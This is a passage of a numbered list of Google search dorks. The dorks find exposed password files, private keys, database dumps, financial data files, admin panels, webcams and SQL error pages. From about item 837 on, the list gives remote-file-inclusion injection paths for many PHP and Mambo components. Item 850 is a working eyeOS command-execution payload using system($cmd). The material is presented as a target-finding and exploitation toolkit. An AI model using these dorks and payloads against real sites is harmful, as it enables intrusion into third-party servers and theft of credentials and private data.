  613. inurl:getmsg.html intitle:hotmail
  614. inurl:log.nsf -gov
  615. inurl:main.php phpMyAdmin
  616. inurl:main.php Welcome to phpMyAdmin
  617. inurl:netscape.hst
  618. inurl:netscape.ini
  619. inurl:odbc.ini ext:ini -cvs
  620. inurl:perl/printenv
  621. inurl:php.ini filetype:ini
  622. inurl:preferences.ini “[emule]”
  623. inurl:profiles filetype:mdb
  624. inurl:report “EVEREST Home Edition ”
  625. inurl:server-info “Apache Server Information”
  626. inurl:server-status “apache”
  627. inurl:snitz_forums_2000.mdb
  628. inurl:ssl.conf filetype:conf
  629. inurl:tdbin
  630. inurl:vbstats.php “page generated”
  631. inurl:wp-mail.php + “There doesn’t seem to be any new mail.”
  632. inurl:XcCDONTS.asp
  633. ipsec.conf
  634. ipsec.secrets
  635. Lotus Domino address books
  636. mail filetype:csv -site:gov intext:name
  637. Microsoft Money Data Files
  638. mt-db-pass.cgi files
  639. MySQL tabledata dumps
  640. mystuff.xml – Trillian data files
  641. OWA Public Folders (direct view)
  642. Peoples MSN contact lists
  643. php-addressbook “This is the addressbook for *” -warning
  644. phpinfo()
  645. phpMyAdmin dumps
  646. private key files (.csr)
  647. private key files (.key)
  648. Quicken data files
  649. rdbqds -site:.edu -site:.mil -site:.gov
  650. robots.txt
  651. site:edu admin grades
  652. site:www.mailinator.com inurl:ShowMail.do
  653. SQL data dumps
  654. Squid cache server reports
  655. Unreal IRCd
  656. WebLog Referrers
  657. Welcome to ntop!
  658. Fichier contenant des informations sur le r?seau :
  659. filetype:log intext:”ConnectionManager2″
  660. “apricot – admin” 00h
  661. “by Reimar Hoven. All Rights Reserved. Disclaimer” | inurl:”log/logdb.dta”
  662. “Network Host Assessment Report” “Internet Scanner”
  663. “Output produced by SysWatch *”
  664. “Phorum Admin” “Database Connection” inurl:forum inurl:admin
  665. “phpOpenTracker” Statistics
  666. “powered | performed by Beyond Security’s Automated Scanning” -kazaa -example
  667. “Shadow Security Scanner performed a vulnerability assessment”
  668. “SnortSnarf alert page”
  669. “The following report contains confidential information” vulnerability -search
  670. “The statistics were last updated” “Daily”-microsoft.com
  671. “this proxy is working fine!” “enter *” “URL***” * visit
  672. “This report lists” “identified by Internet Scanner”
  673. “Traffic Analysis for” “RMON Port * on unit *”
  674. “Version Info” “Boot Version” “Internet Settings”
  675. ((inurl:ifgraph “Page generated at”) OR (“This page was built using ifgraph”))
  676. Analysis Console for Incident Databases
  677. ext:cfg radius.cfg
  678. ext:cgi intext:”nrg-” ” This web page was created on ”
  679. filetype:pdf “Assessment Report” nessus
  680. filetype:php inurl:ipinfo.php “Distributed Intrusion Detection System”
  681. filetype:php inurl:nqt intext:”Network Query Tool”
  682. filetype:vsd vsd network -samples -examples
  683. intext:”Welcome to the Web V.Networks” intitle:”V.Networks [Top]” -filetype:htm
  684. intitle:”ADSL Configuration page”
  685. intitle:”Azureus : Java BitTorrent Client Tracker”
  686. intitle:”Belarc Advisor Current Profile” intext:”Click here for Belarc’s PC Management products, for large and small companies.”
  687. intitle:”BNBT Tracker Info”
  688. intitle:”Microsoft Site Server Analysis”
  689. intitle:”Nessus Scan Report” “This file was generated by Nessus”
  690. intitle:”PHPBTTracker Statistics” | intitle:”PHPBT Tracker Statistics”
  691. intitle:”Retina Report” “CONFIDENTIAL INFORMATION”
  692. intitle:”start.managing.the.device” remote pbx acc
  693. intitle:”sysinfo * ” intext:”Generated by Sysinfo * written by The Gamblers.”
  694. intitle:”twiki” inurl:”TWikiUsers”
  695. inurl:”/catalog.nsf” intitle:catalog
  696. inurl:”install/install.php”
  697. inurl:”map.asp?” intitle:”WhatsUp Gold”
  698. inurl:”NmConsole/Login.asp” | intitle:”Login – Ipswitch WhatsUp Professional 2005″ | intext:”Ipswitch WhatsUp Professional 2005 (SP1)” “Ipswitch, Inc”
  699. inurl:”sitescope.html” intitle:”sitescope” intext:”refresh” -demo
  700. inurl:/adm-cfgedit.php
  701. inurl:/cgi-bin/finger? “In real life”
  702. inurl:/cgi-bin/finger? Enter (account|host|user|username)
  703. inurl:/counter/index.php intitle:”+PHPCounter 7.*”
  704. inurl:CrazyWWWBoard.cgi intext:”detailed debugging information”
  705. inurl:login.jsp.bak
  706. inurl:ovcgi/jovw
  707. inurl:phpSysInfo/ “created by phpsysinfo”
  708. inurl:portscan.php “from Port”|”Port Range”
  709. inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl
  710. inurl:statrep.nsf -gov
  711. inurl:status.cgi?host=all
  712. inurl:testcgi xitami
  713. inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin
  714. inurl:webutil.pl
  715. Looking Glass
  716. site:netcraft.com intitle:That.Site.Running Apache
  717. “A syntax error has occurred” filetype:ihtml
  718. “access denied for user” “using password”
  719. “An illegal character has been found in the statement” -“previous message”
  720. “ASP.NET_SessionId” “data source=”
  721. “Can’t connect to local” intitle:warning
  722. “Chatologica MetaSearch” “stack tracking”
  723. “detected an internal error [IBM][CLI Driver][DB2/6000]”
  724. “error found handling the request” cocoon filetype:xml
  725. “Fatal error: Call to undefined function” -reply -the -next
  726. “Incorrect syntax near”
  727. “Internal Server Error” “server at”
  728. “Invision Power Board Database Error”
  729. “ORA-00933: SQL command not properly ended”
  730. “ORA-12541: TNS:no listener” intitle:”error occurred”
  731. “Parse error: parse error, unexpected T_VARIABLE” “on line” filetype:php
  732. “PostgreSQL query failed: ERROR: parser: parse error”
  733. “Supplied argument is not a valid MySQL result resource”
  734. “Syntax error in query expression ” -the
  735. “The script whose uid is ” “is not allowed to access”
  736. “There seems to have been a problem with the” ” Please try again by clicking the Refresh button in your web browser.”
  737. “Unable to jump to row” “on MySQL result index” “on line”
  738. “Unclosed quotation mark before the character string”
  739. “Warning: Bad arguments to (join|implode) () in” “on line” -help -forum
  740. “Warning: Cannot modify header information – headers already sent”
  741. “Warning: Division by zero in” “on line” -forum
  742. “Warning: mysql_connect(): Access denied for user: ‘*@*” “on line” -help -forum
  743. “Warning: mysql_query()” “invalid query”
  744. “Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL”
  745. “Warning: Supplied argument is not a valid File-Handle resource in”
  746. “Warning:” “failed to open stream: HTTP request failed” “on line”
  747. “Warning:” “SAFE MODE Restriction in effect.” “The script whose uid is” “is not allowed to access owned by uid 0 in” “on line”
  748. “SQL Server Driver][SQL Server]Line 1: Incorrect syntax near”
  749. An unexpected token “END-OF-STATEMENT” was found
  750. Coldfusion Error Pages
  751. filetype:asp + “[ODBC SQL”
  752. filetype:asp “Custom Error Message” Category Source
  753. filetype:log “PHP Parse error” | “PHP Warning” | “PHP Error”
  754. filetype:php inurl:”logging.php” “Discuz” error
  755. ht://Dig htsearch error
  756. IIS 4.0 error messages
  757. IIS web server error messages
  758. Internal Server Error
  759. intext:”Error Message : Error loading required libraries.”
  760. intext:”Warning: Failed opening” “on line” “include_path”
  761. intitle:”Apache Tomcat” “Error Report”
  762. intitle:”Default PLESK Page”
  763. intitle:”Error Occurred While Processing Request” +WHERE (SELECT|INSERT) filetype:cfm
  764. intitle:”Error Occurred” “The error occurred in” filetype:cfm
  765. intitle:”Error using Hypernews” “Server Software”
  766. intitle:”Execution of this script not permitted”
  767. intitle:”Under construction” “does not currently have”
  768. intitle:Configuration.File inurl:softcart.exe
  769. MYSQL error message: supplied argument….
  770. mysql error with query
  771. Netscape Application Server Error page
  772. ORA-00921: unexpected end of SQL command
  773. ORA-00936: missing expression
  774. PHP application warnings failing “include_path”
  775. sitebuildercontent
  776. sitebuilderfiles
  777. sitebuilderpictures
  778. Snitz! forums db path error
  779. SQL syntax error
  780. Supplied argument is not a valid PostgreSQL result
  781. warning “error on line” php sablotron
  782. Windows 2000 web server error messages
  783. “ftp://” “www.eastgame.net”
  784. “html allowed” guestbook
  785. “: vBulletin Version 1.1.5”
  786. “Select a database to view” intitle:”filemaker pro”
  787. “set up the administrator user” inurl:pivot
  788. “There are no Administrators Accounts” inurl:admin.php -mysql_fetch_row
  789. “Welcome to Administration” “General” “Local Domains” “SMTP Authentication” inurl:admin
  790. “Welcome to Intranet”
  791. “Welcome to PHP-Nuke” congratulations
  792. “Welcome to the Prestige Web-Based Configurator”
  793. “YaBB SE Dev Team”
  794. “you can now password” | “this is a special page only seen by you. your profile visitors” inurl:imchaos
  795. (“Indexed.By”|”Monitored.By”) hAcxFtpScan
  796. (inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)
  797. allinurl:”index.php” “site=sglinks”
  798. allinurl:install/install.php
  799. allinurl:intranet admin
  800. filetype:cgi inurl:”fileman.cgi”
  801. filetype:cgi inurl:”Web_Store.cgi”
  802. filetype:php inurl:vAuthenticate
  803. filetype:pl intitle:”Ultraboard Setup”
  804. Gallery in configuration mode
  805. Hassan Consulting’s Shopping Cart Version 1.18
  806. intext:”Warning: * am able * write ** configuration file” “includes/configure.php” –
  807. intitle:”Gateway Configuration Menu”
  808. intitle:”Horde :: My Portal” -“[Tickets”
  809. intitle:”Mail Server CMailServer Webmail” “5.2”
  810. intitle:”MvBlog powered”
  811. intitle:”Remote Desktop Web Connection”
  812. intitle:”Samba Web Administration Tool” intext:”Help Workgroup”
  813. intitle:”Terminal Services Web Connection”
  814. intitle:”Uploader – Uploader v6″ -pixloads.com
  815. intitle:osCommerce inurl:admin intext:”redistributable under the GNU” intext:”Online Catalog” -demo -site:oscommerce.com
  816. inurl:”/NSearch/AdminServlet”
  817. inurl:”index.php? module=ew_filemanager”
  818. inurl:aol*/_do/rss_popup?blogID=
  819. inurl:footer.inc.php
  820. inurl:info.inc.php
  821. inurl:ManyServers.htm
  822. inurl:newsdesk.cgi? inurl:”t=”
  823. inurl:pls/admin_/gateway.htm
  824. inurl:rpSys.html
  825. inurl:search.php vbulletin
  826. inurl:servlet/webacc
  827. natterchat inurl:home.asp -site:natterchat.co.uk
  828. XOOPS Custom Installation
  829. inurl:htpasswd filetype:htpasswd
  830. inurl:yapboz_detay.asp
  831. + View Webcam User Accessing
  832. allinurl:control/multiview
  833. inurl:”ViewerFrame?Mode=”
  834. intitle:”WJ-NT104 Main Page”
  835. inurl:netw_tcp.shtml
  836. intitle:”supervisioncam p
  837. inurl:/_functions.php?prefix=
  838. inurl:/index.php?page=
  839. inurl:index.php?nic=
  840. inurl:*.php?sel=
  841. inurl:*.php?locate=
  842. allinurl:/index.php?page= site:*.dk
  843. /GradeMap/index.php?page=
  844. /page.php?view=
  845. 1. allinurl:my_egallery site:.org
  846. 2. allinurl:xgallery site:.org
  847. 7. Keyword : “powered by AllMyLinks”
  848. 15. keyword : /phorum/login.php
  849. 14. keyword : “powered eyeOs”
  850. /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id
  851. 15. allinurl:.php?bodyfile=
  852. 16. allinurl:/includes/orderSuccess.inc.php?glob=
  853. 22. allinurl:application.php?base_path=
  854. 26. keyword: “powered by smartblog” AND inurl:?page=login
  855. /forum/admin/index.php?inc_conf=
  856. inurl:”/lire.php?rub=”
  857. rfi of this dork: /embed/day.php?path=
  858. rfi to this dork: /sources/functions.php?CONFIG[main_path]=
  859. cgi-bin/calendar.pl?fromTemplate=
  860. zb41/include/write.php?dir=
  861. cgi-bin/awstats.pl?logfile=
  862. include/mssql7.php?inc_dir=
  863. include/postgres.php?inc_dir=
  864. install.php?phpbb_root_dir=
  865. mantis/login_page.php?g_meta_inc_dir=
  866. pollensondage.inc.php?app_path=
  867. _functions.php?prefix=
  868. cpcommerce/_functions.php?prefix=
  869. b2-tools/gm-2-b2.php?b2inc=
  870. hcl/inc/pipe.php?HCL_path=
  871. support/faq/inc/pipe.php?HCL_path=
  872. gnu3/index.php?doc=
  873. inc/authform.inc.php?path_pre=
  874. web_statistics//modules/My_eGallery/public/displayCategory.php?basepath=
  875. index.inc.php?PATH_Includes=
  876. ashheadlines.php?pathtoashnews=
  877. demo/includes/init.php?user_inc=
  878. inc/shows.inc.php?cutepath=
  879. derniers_commentaires.php?rep=
  880. allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
  881. calendar/events/header.inc.php?serverPath=
  882. install/index.php?G_PATH=
  883. modules/My_eGallery/public/inc/?HCL_path=
  884. /modules/Forums/admin/index.php?phpbb_root_path=
  885. /forums.php?m=
  886. inurl:/e107/e107_handlers/secure_img_render.php?p=
  887. inurl:/shoutbox/expanded.php?conf=
  888. inurl:/index.php?include=
  889. inurl:/template.php?pagina=
  890. inurl:index.php?content=
  891. inurl:index.php?view=
  892. /ashheadlines.php?pathtoashnews=
  893. /html/page.php?page=
  894. 3. allinurl:coppermine site:.org
  895. 11. keyword : “Powered by phpBB 2.0.6″
  896. 14. allinurl:”powered by AshNews”, allinurl:AshNews atau allinurl: /ashnews.php
  897. /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=
  898. 21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( “powered by AllMyGuests”)
  899. 30. allinurl: /osticket/
  900. 34. keyworld: allinurl:/phpGedview/login.php site:
  901. inurl:”template.php?goto=”
  902. rfi to this dork: /main.php?sayfa=
  903. inurl:”index1.php?=”
  904. iurl:”index2.php?p=”
  905. /surveys/survey.inc.php?path= inurl:surveys
  906. index.php?body= inurl:”index.php?body=”
  907. /classes/adodbt/sql.php?classes_dir= allinurl:adobt site:pl
  908. enc/content.php?Home_Path= “powered by doodle cart”
  909. /classified_right.php?language_dir= inurl:classified.php phpbazar
  910. /sources/template.php?CONFIG[main_path]= “(Powered By ScozNews)”
  911. /embed/day.php?path= intitle:”Login to Calendar”
  912. /mcf.php?content= allinurl:”mcf.php” site:.de
  913. /components/com_facileforms/facileforms.frame.php?ff_compath= allinurl:”com_facileforms” site:.ar
  914. /zipndownload.php?PP_PATH= “Powered by: PhotoPost PHP 4.6″
  915. /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path= inurl:”com_serverstat”
  916. /components/com_zoom/includes/database.php?mosConfig_absolute_path= inurl:”index.php?option=”com_zoom”
  917. /main.php?sayfa= inurl:”main.php?sayfa=”
  918. /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= allinurl:com_extended_registration
  919. /addpost_newpoll.php?addpoll=preview&thispath= allinurl:”/ubbthreads/”
  920. components/com_performs/performs.php?mosConfig_absolute_path= inurl:”com_performs”
  921. /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= “powered by phpCOIN 1.2.3″
  922. administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:.com/index.php?option=com_remository
  923. /modules/TotalCalendar/about.php?inc_dir= allinurl:/TotalCalendar
  924. /login.php?dir= allinurl:login.php?dir=
  925. index.php?pageurl= inurl:”index.php?pageurl=*.php”
  926. index.php?var= inurl:”index.php?var=*.php”
  927. index.php?go= inurl:”index.php?go=”
  928. index.php?site= inurl:”index.php?site=”
  929. phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= inurl:”phpwcms/index.php?id=”
  930. administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:”.com.*/index.php?option=com_comprofiler”
  931. index.php?pagina= inurl:”index.php?pagina=*.php”
  932. index.php?id= inurl:”index.php?id=*.php”
  933. index1.php?= inurl:”index1.php?=*.php?
  934. index.php?site= inurl:”index.php?site=*.php”
  935. main.php?id= inurl:”main.php?id=*.php”
  936. content.php?page= inurl:”content.php?page=*.php”
  937. admin.php?page= inurl:”admin.php?page=*.php”
  938. lib/gore.php?libpath= inurl:”/SQuery/”
  939. SQuery/lib/gore.php?libpath= inurl:”/SQuery/”
  940. index2.php?p= inurl:”index2.php?p=*.php”
  941. index1.php?go= inurl:”index1.php?go=*.php”
  942. news_detail.php?file= inurl:”news_detail.php?file=*.php”
  943. old_reports.php?file= inurl:”old_reports.php?file=*.php”
  944. index.php?x= inurl:”index.php?x=*.php”
  945. index.php?nic= inurl:”index.php?nic=*.php”
  946. homepage.php?sel= inurl:”homepage.php?sel=*.php”
  947. index.php?sel= inurl:”index.php?sel=*.php”
  948. main.php?x= inurl:”main.php?x=*.php”
  949. components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path= “inurl:com_artlinks”
  950. index2.php?x= inurl:index2.php?x=*.php”
  951. main.php?pagina= inurl:”main.php?pagina=*.php”
  952. test.php?page= allinurl:test.php?page=
  953. components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= “inurl:com_phpshop”
  954. akocomments.php?mosConfig_absolute_path= inurl:akocomments.php
  955. index.php?page= inurl:”edu/index.php?page=*.php”
  956. *.php?page= inurl:*.php?page=*.php”
  957. index.php?oldal= inurl:”index.php?oldal=*.php”
  958. index.php?lang=gr&file inurl:”index.php?lang=gr&file=*.php”
  959. index.php?pag= inurl:”index.php?pag=*.php”
  960. index.php?incl= inurl:”index.php?incl=”
  961. avatar.php?page= inurl:”avatar.php?page=”
  962. index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= “Mambo is A Free
  963. index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path= “Mambo is”
  964. ndex.php?p= inurl:”edu/index.php?p=*.php”
  965. /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:/xgallery/
  966. index.php?x= inurl:”com/index.php?x=*.php”
  967. index.php?mode= inurl:”com/index.php?mode=*.php”
  968. index.php?stranica= inurl:”index.php?stranica=”
  969. index.php?sub= inurl:”il/index.php?sub=*.php”
  970. index.php?id= inurl:”/index.php?id=*.php”
  971. index.php?t= inurl:”/index.php?t=*.php”
  972. index.php?r= inurl:”index.php?r=*.php”
  973. index.php?menu= inurl:”net/index.php?menu=*.php”
  974. index.php?pag= inurl:”com/index.php?pag=*.php”
  975. solpot.html?body= allinurl: “solpot.html?body”
  976. port.php?content= inurl:port.php?content=*.php”
  977. index0.php?show= inurl:index0.php?show=*.php”
  978. administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:/index.php?option=com_comprofiler”
  979. /tools/send_reminders.php?includedir= allinurl:day.php?date= inurl:/day.php?date=
  980. administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:/index.php?option=com_remository
  981. /tags.php?BBCodeFile= intitle:”Tagger LE” inurl:tags.php site:br
  982. content.php?page= inurl:”*content.php?page=*.php”
  983. index.php?topic= inurl:”/index.php?topic=*.php”
  984. index.php?u= inurl:”/index.php?u=*.php”
  985. administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= inurl:”com_linkdirectory”
  986. administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= inurl:”.tr./components”
  987. modules/My_eGallery/index.php?basepath= inurl:”My_eGallery”
  988. /modules/vwar/admin/admin.php?vwar_root= inurl:”vwar”
  989. index.php?loc= allinurl:.br/index.php?loc=
  990. administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:”us/index.php?option=com_comprofiler”
  991. administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= inurl:”com_cropimage”
  992. /tags.php?BBCodeFile= intitle:”Tagger LE” inurl:tags.php
  993. myevent.php?myevent_path= inurl:myevent.php
  994. /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path= allinurl:”com_uhp”
  995. myevent.php?myevent_path= inurl:”uk/myevent.php
  996. includes/functions.php?phpbb_root_path= powered by Integramod
  997. m2f/m2f_phpbb204.php?m2f_root_path= allinurl:/m2f_usercp.php?
  998. /tags.php?BBCodeFile= intitle:”Tagger LE” inurl:”uk/tags.php
  999. administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= inurl:”us/index.php?option=com_remository
  1000. show.php?path= inurl:fclick
  1001. show.php?path= inurl:.ac.uk/fclick
  1002. administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= inurl:”.de.*/com_linkdirectory”
  1003. administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site= inurl:”com_a6mambocredits”
  1004. index.php?template= inurl:”index.php?”
  1005. search.php?cutepath= inurl:”search.php?”
  1006. show_news.php?cutepath= inurl:”show_news.php?”
  1007. page.php?doc= allinurl:”page.php?doc=”
  1008. administrator/components/com_webring/admin.webring.docs.php?component_dir= inurl:”com_webring”
  1009. administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path= inurl:”.de.*/com_mgm”
  1010. help.php?css_path= inurl:phplive site:.ru
  1011. components/com_galleria/galleria.html.php?mosConfig_absolute_path= inurl:”com_galleria/”
  1012. big.php?pathtotemplate= inurl:”.de.*”big.php?”
  1013. includes/search.php?GlobalSettings[templatesDirectory]= inurl:”.com”search.php?”
  1014. interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include= “Papoo CMS”
  1015. /functions.php?include_path= “powered by: phpecard”
  1016. modules/My_eGallery/index.php?basepath= inurl:”.de.*”My_eGallery”
  1017. components/com_galleria/galleria.html.php?mosConfig_absolute_path= inurl:”.net.*”com_galleria/”
  1018. /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= “powered by CubeCart 3.0.6”
  1019. /class.mysql.php?path_to_bt_dir= “powered by paBugs 2.0 Beta 3”
  1020. /include/footer.inc.php?_AMLconfig[cfg_serverpath]= “powered by AllMyLinks”
  1021. /squirrelcart/cart_content.php?cart_isp_root= allinurl:/squirrelcart/
  1022. index2.php?to= inurl:”/index2.php?to=*.php”
  1023. index.php?load= inurl:”/index.php?load=*.php”
  1024. home.php?pagina= inurl:”home.php?pagina=”
  1025. /modules/coppermine/include/init.inc.php?CPG_M_DIR= allinurl:modules.php?name=coppermine
  1026. /modules/Forums/admin/admin_styles.php?phpbb_root_path= allinurl:modules.php?name=forums
  1027. /modules/vwar/admin/admin.php?vwar_root= allinurl:modules.php?name=vwar
  1028. /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= allinurl:modules.php?name=PNphpBB2
  1029. /modules/My_eGallery/public/displayCategory.php?basepath= allinurl:modules.php?name=my_egallery
  1030. /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:modules.php?name=xgallery
  1031. /modules/4nAlbum/public/displayCategory.php?basepath= allinurl:modules.php?name=4nAlbum
  1032. /include/write.php?dir= allinurl:/zboard/zboard.php
  1033. db.php?path_local= inurl:”db.php?path_local=”
  1034. index.php?url= inurl:”index.php?url=”
  1035. index.php?p= inurl:”index.php?p=”
  1036. index.php?openfile= inurl:”index.php?openfile=”
  1037. index.php?file= inurl:”index.php?file=”
  1038. index.php?content= inurl:”index.php?content=”
  1039. index.php?side= inurl:”index.php?side=”
  1040. index.php?kobr= inurl:”index.php?kobr=”index.php?pg= inurl:”index.php?pg=”
  1041. index.php?doc= inurl:”index.php?doc=”
  1042. index.php?l= inurl:”index.php?l=”
  1043. index.php?a= inurl:”index.php?a=”
  1044. index.php?principal= inurl:”index.php?principal=”
  1045. index.php?opcao= inurl:”index.php?opcao=”
  1046. index.php?conteudo= inurl:”index.php?conteudo=”
  1047. index.php?meio= inurl:”index.php?meio=”
  1048. index.php?inc= inurl:”index.php?inc=”
  1049. index.php?c= inurl:”index.php?c=”
  1050. index.php?rage= inurl:”index.php?rage=”
  1051. index.php?arquivo= inurl:”index.php?arquivo=”
  1052. index.php?nic= inurl:”index.php?nic=”
  1053. components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path= inurl:”com_mtree”
  1054. index.php?place= inurl:”index.php?place=”
  1055. index.php?show= inurl:”index.php?show=”
  1056. index.php?dsp= inurl:”index.php?dsp=”
  1057. index.php?dept= inurl:”index.php?dept=”
  1058. index.php?lg= inurl:”index.php?lg=”
  1059. index.php?inhalt= inurl:”index.php?inhalt=”
  1060. index.php?ort= inurl:”index.php?ort=”
  1061. index.php?pilih= inurl:”index.php?pilih=”
  1062. principal.php?conteudo= inurl:”principal.php?conteudo=”
  1063. main.php?site= inurl:”main.php?site=”
  1064. template.php?pagina= inurl:”template.php?pagina=”
  1065. contenido.php?sec= inurl:”contenido.php?sec=”
  1066. index_principal.php?pagina= inurl:”index_principal.php?pagina=”
  1067. template.php?name= inurl:”template.php?name=”
  1068. forum.php?act= inurl:”forum.php?act=”
  1069. home.php?action= inurl:”home.php?action=”
  1070. noticias.php?arq= inurl:”noticias.php?arq=”
  1071. main.php?x= inurl:”main.php?x=”
  1072. main.php?page= inurl:”main.php?page=”
  1073. default.php?page= inurl:”default.php?page=”
  1074. index.php?cont= inurl:”index.php?cont=”
  1075. index.php?configFile= inurl:”index.php?configFile=”
  1076. index.php?meio.php= inurl:”index.php?meio.php=”
  1077. index.php?include= inurl:”index.php?include=”
  1078. index.php?open= inurl:”index.php?open=
  1079. index.php?visualizar= inurl:”index.php?visualizar=”
  1080. index.php?x= inurl:”index.php?x=”
  1081. index.php?pag= inurl:”index.php?pag=”
  1082. index.php?cat= inurl:”index.php?cat=”
  1083. index.php?action= inurl:”index.php?action=”
  1084. index.php?do= inurl:”index.php?do=”
  1085. index2.php?content= inurl:”index2.php?content=”
  1086. main.php?pagina= inurl:”main.php?pagina=”
  1087. index.phpmain.php?x= inurl:”index.phpmain.php?x=”
  1088. index.php?link= inurl:”index.php?link=”
  1089. index.php?canal= inurl:”index.php?canal=”
  1090. index.php?screen= inurl:”index.php?screen=”
  1091. index.php?langc= inurl:”index.php?langc=”
  1092. services.php?page= inurl:”services.php?page=”
  1093. htmltonuke.php?filnavn= inurl:”htmltonuke.php?filnavn=”
  1094. ihm.php?p= inurl:”ihm.php?p=”
  1095. folder.php?id= inurl:”folder.php?id=”
  1096. index.php?Load= inurl:”index.php?Load=”
  1097. index.php?Language= inurl:”index.php?Language=”
  1098. hall.php?file= inurl:”hall.php?file=”
  1099. hall.php?page= inurl:”hall.php?page=”
  1100. template.php?goto= inurl:”template.php?goto=”
  1101. video.php?content= inurl:”video.php?content=”
  1102. pages.php?page= inurl:”pages.php?page=”
  1103. print.php?page= inurl:”print.php?page=”
  1104. show.php?page= inurl:”show.php?page=”
  1105. view.php?page= inurl:”view.php?page=”
  1106. media.php?page= inurl:”media.php?page=”
  1107. index1.php?choix= inurl:”index1.php?choix=”
  1108. index1.php?menu= inurl:”index1.php?menu”
  1109. index2.php?showpage= inurl:”index2.php?showpage=”
  1110. index2.php?ascii_seite= inurl:”index2.php?ascii_seite=”
  1111. index2.php?DoAction= inurl:”index2.php?DoAction=”
  1112. index2.php?ID= inurl:”index2.php?ID=”
  1113. index2.php?url_page= inurl:”index2.php?url_page=”
  1114. index1.php?dat= inurl:”index1.php?dat=”
  1115. index1.php?site= inurl:”index1.php?site=”
  1116. index0.php?show= inurl:”index0.php?show=”
  1117. home.php?content= inurl:”home.php?content=”
  1118. port.php?content= inurl:”port.php?content=”
  1119. main.php?link= inurl:”main.php?link=”
  1120. home.php?x= inurl:”home.php?x=”
  1121. index1.php?x= inurl:”index1.php?x=”
  1122. index2.php?x= inurl:”index2.php?x=”
  1123. homepage.php?sel= inurl:”homepage.php?sel=”
  1124. /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR= allinurl:/xoopsgallery/
  1125. /modules/agendax/addevent.inc.php?agendax_path= allinurl:/agendax/
  1126. /include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/
  1127. /contrib/yabbse/poc.php?poc_root_path= ntitle:PHPOpenChat ext:php
  1128. /phpopenchat/contrib/yabbse/poc.php?sourcedir= ntitle:PHPOpenChat ext:php
  1129. /photoalb/lib/static/header.php?set_menu= allintitle:iPhotoAlbum
  1130. /squito/photolist.inc.php?photoroot= “Squitosoft All Rights Reserved”
  1131. /bz/squito/photolist.inc.php?photoroot= “Squitosoft All Rights Reserved”
  1132. /ppa/inc/functions.inc.php?config[ppa_root_path]= allinurl:**/screens/displayimage.php?pid=*
  1133. /spid/lang/lang.php?lang_path= allinurl:**/spid.php allinurl:**/spid.php?cat=*lang=
  1134. /classes.php?LOCAL_PATH= “powered by siteframe”
  1135. al_initialize.php?alpath= “Powered by AutoLinks Pro”
  1136. /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]= allinurl:*br*/newbb_plus/*
  1137. /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “Powered by Mambo” inurl:*gov*
  1138. /extensions/moblog/moblog_lib.php?basedir= “powered by pivot”
  1139. /app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH= “phpCodeGenie v. 3.0.2″
  1140. modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= inurl:”AllMyGuests”
  1141. /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path= allinurl:”com_rsgallery”
  1142. /components/com_smf/smf.php?mosConfig_absolute_path= allinurl:”com_smf”
  1143. /components/com_cpg/cpg.php?mosConfig_absolute_path= index.php?option=com_cpg
  1144. administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= inurl:”com_peoplebook”
  1145. /admin_modules/admin_module_deldir.inc.php?config[path_src_include]= “Powered by yappa-ng 2.3.1”
  1146. inc/cmses/aedating4CMS.php?dir[inc]= inurl:flashchat site:br bp_ncom.php?bnrep= “Script r?alis? par BinGo PHP”
  1147. /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path= inurl:”/com_mtree/”
  1148. /jscript.php?my_ms[root]= intitle:”myspeach” inurl:”chat_exemple.php”
  1149. /popup_window.php?site_isp_root= inurl:”Squirrelcart”
